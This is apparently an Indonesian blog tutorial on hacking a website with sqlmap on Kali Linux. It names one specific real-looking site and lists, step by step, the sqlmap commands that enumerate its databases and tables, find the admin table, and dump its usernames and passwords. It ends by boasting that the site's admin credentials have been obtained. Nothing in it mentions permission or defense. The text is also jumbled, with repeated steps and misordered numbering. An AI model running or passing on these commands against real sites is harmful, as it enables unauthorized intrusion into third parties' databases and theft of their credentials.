Hacking Website dengan SQLMap di Kali Linux
target "http://www.solutionpack.my/products.php?id=9"
selesai sudah kita dapatkan username dan password website nya
2. inilah perbedaannya danga backtrack,
kita tidak harus menuju folder sqlmap terlebih dahulu untuk
menjalankanya tetapi langsung kita ketikkan perintah berikut :
root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs
3. terlihat ada 2 database :
[*] information_schema
[*] solution_newgads
selanjutnya kita cari tabel yang ada di database solution_newgads
dengan perintah
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables
root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs
[*] information_schema
[*] solution_newgads
selanjutnya kita cari tabel yang ada di database solution_newgads
dengan perintah
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables
4. akan muncul nama-nama kolom dari
database tersebut, lalau kita cari isi kolom yang berisi username dan
password admin…dengan perinth berikut
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
5. untuk melihat isi dari kolom dari username dan pasword tersebut tuliskan perintah:
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C username,password --dump
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C username,password --dump
selesai sudah kita dapatkan username dan password website nya
Comments